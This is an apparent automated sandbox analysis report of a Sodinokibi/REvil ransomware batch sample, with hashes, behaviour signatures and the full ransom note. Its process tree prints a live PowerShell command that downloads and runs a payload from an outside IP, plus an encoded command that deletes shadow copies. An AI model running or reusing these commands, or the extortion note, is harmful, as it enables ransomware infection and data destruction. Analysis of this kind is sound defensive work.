Analysis

  • max time kernel
    36s
  • max time network
    55s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    01-06-2020 14:10

General

  • Target

    02025aebdb58d5c91227c70c8d753db5.bat

  • Size

    217B

  • MD5

    abbe954f66b1dd339f454ca325488e57

  • SHA1

    ecbf3a90c0936599cb41a907bd278fb7f9c0dc23

  • SHA256

    2bba8f17fc1ba279cde43a2555b981ff02d563e845d42800bb51973fe66b4a40

  • SHA512

    674f4a11ca927f19e02d1940711ca082069fa226e31cad3456370e990151f681ff6a611b8b25f42fb366748f10899bf26907b35770e790c08209d2ca1b9a97f3

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/02025aebdb58d5c91227c70c8d753db5

Extracted

Path

C:\2gqxv6-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 2gqxv6. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US [+] [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/72B60BE891E1358C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/72B60BE891E1358C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Y5BsJAQFGgl8A+VhgGzRjUSOSfODpCJi6bEljyakiCQMqlPulGfBmmd6VREenCWa Dqj+Cbq7N6MKpmRboCkS6wUJky/2xLAKGMJAM9yR9u2HBZlqFyoE2q2E4LmljAEX y5k65U/DKfShdbLZB0JyB0JUpWu3O/toqAk3EEBvvvIfdxt+n3rz/JOH+SZFQgbs FwEQoTKNr4BGiz0yyhZfHIkTeMD4dRsIxQCkh+tBkACdsedlNPILwGjJ2PWrfMue 2a70RF1VKPxGVvjV1/aTG9OtAeRKSLhcefYXhNQ/CX2P5jlYTxTcy/OFB1g/PsCb 5JJLbApgWYPO+oxc4exCrtmURe7Zue0eVOCuzMoP5vGjEMGIud5WQLvbAKY+RWUi LysJFAulhfxpaS8SuwC9482U5A1+Q05YKPwi6MQBKaEUBZBRIYawXjc02fGpdJSY sYBVuqkPTU/q128EbhrmRAg1orFP7Js0m4Q8X5rYfUfWBUpztdXhiZWyl8z5TEwJ sTtPu7swCdjqt+/h/pd/oFS1N3xz80SnDw0X7OpCRbbjgMJoQ1w+I1EzvUK3bv9W uWPBSIGsrAEf8ZTJrF/E7I/Ay2W89rhrpiw/fahoRzr2bWL4i+7yfL0bUisq7uzD gx++inDxX7LoF4smupxit2EBOg9scl175Q7SsVjxjn7uOOF93RgrAY5xfGLJaCWv eF2PpQ/IEjHDNpusokOlcCpGj5jB7Q+PSSNhKjJUSjYywUIWxCN3sdPmVxVnJfx0 AhcH21fnNTpzmvsnMQxEUPCTzU0ZbTH1EBfU1N3qDwub7Y+ZVX/gxS7010f39kbu OqoFeLjwz7jbk+lg/2H97lqegdLLwh9kfSx2LvZ9zTKEGg6HNVRgbVhdCj+BsrJ/ UuJgUEOGHlFXljnOgLomlOT6OD7tbc6h7cZ1y3rwBpVp7LG6G+rWgDDzOod8FLQ9 s5w83HxiNXB7jXanCcoG6l0HQSe7p8ZhgOWsObVwGKnIhJLQVggjXM7mN4huM5t+ 7n0DvhFayqijayoS9ZSWBP60WCcLd8It3496M0v1FBT0nSZS6pGS0WFqrHJMIJqc SMkCHERRFpw/DEudUDP6vrYYM2gH9Q+dhLnm3dwDTz79rg6aN3TuU+vDphRsr1mp SMzgLU+wJPjGT6SZ0oyWI1Uajnm0bl1aeINPEHXNV34b0fNCJLNiCk6gQsCbxylt 8/02/Zr596CeHmNLJ8KlwmYxVdDNrxIXCKlIQk7IrhIMgg+faErHzwvi9xQ1D+GY qrPKv73R92DmoPBa2cdEMfMPpyX+Rk+b91lncO7OTDw= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/72B60BE891E1358C

http://decryptor.cc/72B60BE891E1358C

Signatures

  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\02025aebdb58d5c91227c70c8d753db5.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02025aebdb58d5c91227c70c8d753db5');Invoke-YKSOHGHYRH;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Blacklisted process makes network request
      PID:1296
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1540
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1816

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms